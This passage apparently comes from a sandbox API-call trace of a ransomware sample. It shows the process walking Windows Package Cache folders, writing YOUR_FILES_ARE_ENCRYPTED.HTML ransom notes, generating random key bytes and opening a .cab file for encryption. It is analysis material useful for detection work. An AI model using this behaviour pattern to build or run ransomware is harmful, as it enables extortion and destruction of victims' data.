0x600000 [0108.489] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.490] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6505595c, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6505595c, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f1870, dwReserved1=0x623f60, cFileName="vcRuntimeMinimum_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0108.490] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0108.490] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0108.490] GetProcessHeap () returned 0x600000 [0108.490] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0108.491] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\packages\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\packages\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0108.491] WriteFile (in: hFile=0x308, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0108.492] CloseHandle (hObject=0x308) returned 1 [0108.493] GetProcessHeap () returned 0x600000 [0108.493] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0108.493] GetProcessHeap () returned 0x600000 [0108.493] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.495] FindNextFileW (in: hFindFile=0x626738, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6502f6da, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x6502f6da, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6502f6da, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 0 [0108.495] FindClose (in: hFindFile=0x626738 | out: hFindFile=0x626738) returned 1 [0108.495] wnsprintfW (in: pszDest=0x6994a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0108.495] GetProcessHeap () returned 0x600000 [0108.495] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6a94a8 [0108.495] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{2BC3BD4D-FABA-4394-93C7-9AC82A263FE2}v14.25.28508\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{2bc3bd4d-faba-4394-93c7-9ac82a263fe2}v14.25.28508\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.496] WriteFile (in: hFile=0x30c, lpBuffer=0x6a94a8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6a94a8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.498] CloseHandle (hObject=0x30c) returned 1 [0108.499] GetProcessHeap () returned 0x600000 [0108.499] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6a94a8 | out: hHeap=0x600000) returned 1 [0108.499] GetProcessHeap () returned 0x600000 [0108.499] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6994a0 | out: hHeap=0x600000) returned 1 [0108.500] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", cAlternateFileName="{33D1F~1")) returned 1 [0108.500] StrStrIW (lpFirst="{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.500] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned 71 [0108.500] GetProcessHeap () returned 0x600000 [0108.500] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.501] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" [0108.501] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*" [0108.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x626978 [0108.502] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x387f5bb4, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0108.502] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x9d5870d9, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x272, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="state.rsm", cAlternateFileName="")) returned 1 [0108.502] StrStrIW (lpFirst="state.rsm", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.502] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\state.rsm") returned 81 [0108.502] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0108.502] lstrlenW (lpString=".rsm") returned 4 [0108.502] PathFindExtensionW (pszPath="state.rsm") returned=".rsm" [0108.502] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x34a1fdf0, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 1 [0108.502] StrStrIW (lpFirst="vcredist_x86.exe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.502] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\vcredist_x86.exe") returned 88 [0108.502] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0108.502] lstrlenW (lpString=".exe") returned 4 [0108.502] PathFindExtensionW (pszPath="vcredist_x86.exe") returned=".exe" [0108.502] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x387f5bb4, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x387f5bb4, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x34a1fdf0, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x6f428, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="vcredist_x86.exe", cAlternateFileName="VCREDI~1.EXE")) returned 0 [0108.502] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0108.503] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0108.503] GetProcessHeap () returned 0x600000 [0108.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x314b010 [0108.503] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\package cache\\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x30c [0108.505] WriteFile (in: hFile=0x30c, lpBuffer=0x314b010*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x314b010*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0108.506] CloseHandle (hObject=0x30c) returned 1 [0108.507] GetProcessHeap () returned 0x600000 [0108.507] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0108.507] GetProcessHeap () returned 0x600000 [0108.507] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0108.507] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fce5b7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fdd028, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", cAlternateFileName="{37B8F~1.610")) returned 1 [0108.508] StrStrIW (lpFirst="{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.508] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned 82 [0108.508] GetProcessHeap () returned 0x600000 [0108.508] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0108.509] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030" [0108.509] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*" [0108.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fce5b7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fdd028, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName=".", cAlternateFileName="")) returned 0x6266b8 [0108.510] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fce5b7, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fdd028, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="..", cAlternateFileName="")) returned 1 [0108.510] FindNextFileW (in: hFindFile=0x6266b8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fdd028, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623f9a, dwReserved1=0x623f58, cFileName="packages", cAlternateFileName="")) returned 1 [0108.510] StrStrIW (lpFirst="packages", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.510] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned 91 [0108.510] GetProcessHeap () returned 0x600000 [0108.510] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0108.511] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages" [0108.511] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*" [0108.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fdd028, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f12b0, dwReserved1=0x623f60, cFileName=".", cAlternateFileName="")) returned 0x626838 [0108.511] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x44fdd028, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x44fdd028, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f12b0, dwReserved1=0x623f60, cFileName="..", cAlternateFileName="")) returned 1 [0108.511] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x45016665, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x45016665, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f12b0, dwReserved1=0x623f60, cFileName="vcRuntimeAdditional_amd64", cAlternateFileName="VCRUNT~1")) returned 1 [0108.511] StrStrIW (lpFirst="vcRuntimeAdditional_amd64", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.511] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned 117 [0108.511] GetProcessHeap () returned 0x600000 [0108.511] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x671348 [0108.513] lstrcpyW (in: lpString1=0x671348, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64" [0108.513] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*") returned="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*" [0108.513] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x45016665, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x45016665, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0108.513] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x44fdd028, ftCreationTime.dwHighDateTime=0x1d705cc, ftLastAccessTime.dwLowDateTime=0x45016665, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x45016665, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="..", cAlternateFileName="")) returned 1 [0108.513] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x18637300, ftCreationTime.dwHighDateTime=0x1ced525, ftLastAccessTime.dwLowDateTime=0x18637300, ftLastAccessTime.dwHighDateTime=0x1ced525, ftLastWriteTime.dwLowDateTime=0x18637300, ftLastWriteTime.dwHighDateTime=0x1ced525, nFileSizeHigh=0x0, nFileSizeLow=0x588124, dwReserved0=0x63d148, dwReserved1=0x63d090, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0108.513] StrStrIW (lpFirst="cab1.cab", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0108.513] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab") returned 126 [0108.513] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.513] lstrlenW (lpString=".cab") returned 4 [0108.519] PathFindExtensionW (pszPath="cab1.cab") returned=".cab" [0108.519] SystemFunction036 (in: RandomBuffer=0x19e794, RandomBufferLength=0x20 | out: RandomBuffer=0x19e794) returned 1 [0108.520] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{37b8f9c7-03fb-3253-8781-2517c99d7c00}v11.0.61030\\packages\\vcruntimeadditional_amd64\\cab1.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0108.520] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e7b8 | out: lpFileSize=0x19e7b8*=5800228) returned 1 [0108.520] GetProcessHeap () returned 0x600000 [0108.521] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x681350 [0108.557] wsprintfW (in: param_1=0x19e6d2, param_2="%02X" | out: param_1="F7") returned 2 [0108.557] wsprintfW (in: param_1=0x19e6d6, param_2="%02X" | out: param_1="3C") returned 2 [0108.557] wsprintfW (in: param_1=0x19e6da, param_2="%02X" | out: param_1="8D") returned 2 [0108.557] wsprintfW (in: param_1=0x19e6de, param_2="%02X" | out: param_1="AD") returned 2 [0108.557] wsprintfW (in: param_1=0x19e6e2, param_2="%02X" | out: param_1="C8") returned 2 [0108.557] wsprintfW (in: param_1=0x19e6e6, param_2="%02X" | out: param_1="80") returned 2 [0108.558] wsprintfW (in: param_1=0x19e6ea, param_2="%02X" | out: param_1="FD") returned 2 [0108.558] wsprintfW (in: param_1=0x19e6ee, param_2="%02X" | out: param_1="3E") returned 2 [0108.558] wsprintfW (in: param_1=0x19e6f2, param_2="%02X" | out: param_1="1F") returned 2 [0108.558] wsprintfW (in: param_1=0x19e6f6, param_2="%02X" | out: param_1="1E") returned 2 [0108.558] wsprintfW (in: param_1=0x19e6fa, param_2="%02X" | out: param_1="1E") returned 2 [0108.558] wsprintfW (in: param_1=0x19e6fe, param_2="%02X" | out: param_1="F8") returned 2 [0108.558] wsprintfW (in: param_1=0x19e702, param_2="%02X" | out: param_1="B3") returned 2 [0108.558] wsprintfW (in: param_1=0x19e706, param_2="%02X" | out: param_1="DE") returned 2 [0108.558] wsprintfW (in: param_1=0x19e70a, param_2="%02X" | out: param_1="A5") returned 2 [0108.558] wsprintfW (in: param_1=0x19e70e, param_2="%02X" | out: param_1="4D") returned 2 [0108.558] wsprintfW (in: param_1=0x19e712, param_2="%02X" | out: param_1="93") returned 2 [0108.558] wsprintfW (in: param_1=0x19e716, param_2="%02X" | out: param_1="8B") returned 2 [0108.558] wsprintfW (in: param_1=0x19e71a, param_2="%02X" | out: param_1="C5") returned 2 [0108.558] wsprintfW (in: param_1=0x19e71e, param_2="%02X" | out: param_1="6F") returned 2 [0108.558] wsprintfW (in: param_1=0x19e722, param_2="%02X" | out: param_1="33") returned 2 [0108.558] wsprintfW (in: param_1=0x19e726, param_2="%02X" | out: param_1="8A") returned 2 [0108.558] wsprintfW (in: param_1=0x19e72a, param_2="%02X" | out: param_1="80") returned 2 [0108.558] wsprintfW (in: param_1=0x19e72e, param_2="%02X" | out: param_1="BE") returned 2 [0108.558] wsprintfW (in: param_1=0x19e732, param_2="%02X" | out: param_1="A0") returned 2 [0108.558] wsprintfW (in: param_1=0x19e736, param_2="%02X" | out: param_1="AB") returned 2 [0108.558] wsprintfW (in: param_1=0x19e73a, param_2="%02X" | out: param_1="60") returned 2 [0108.558] wsprintfW (in: param_1=0x19e73e, param_2="%02X" | out: param_1="C3") returned 2 [0108.558] wsprintfW (in: param_1=0x19e742, param_2="%02X" | out: param_1="1F") returned 2 [0108.558] wsprintfW (in: param_1=0x19e746, param_2="%02X" | out: param_1="C7") returned 2 [0108.558] wsprintfW (in: param_1=0x19e74a, param_2="%02X" | out: param_1="72") returned 2 [0108.558] wsprintfW (in: param_1=0x19e74e, param_2="%02X" | out: param_1="43") returned 2 [0108.559] lstrcpyW (in: lpString1=0x691404, lpString2="\\\\?\\C:\\ProgramData\\Package Cache\\{37B8F9C7-03FB-3253-8781-2517C99D7C00}v11.0.61030\\packages\\vcRuntimeAdditional_amd64\\cab1.cab" | out: 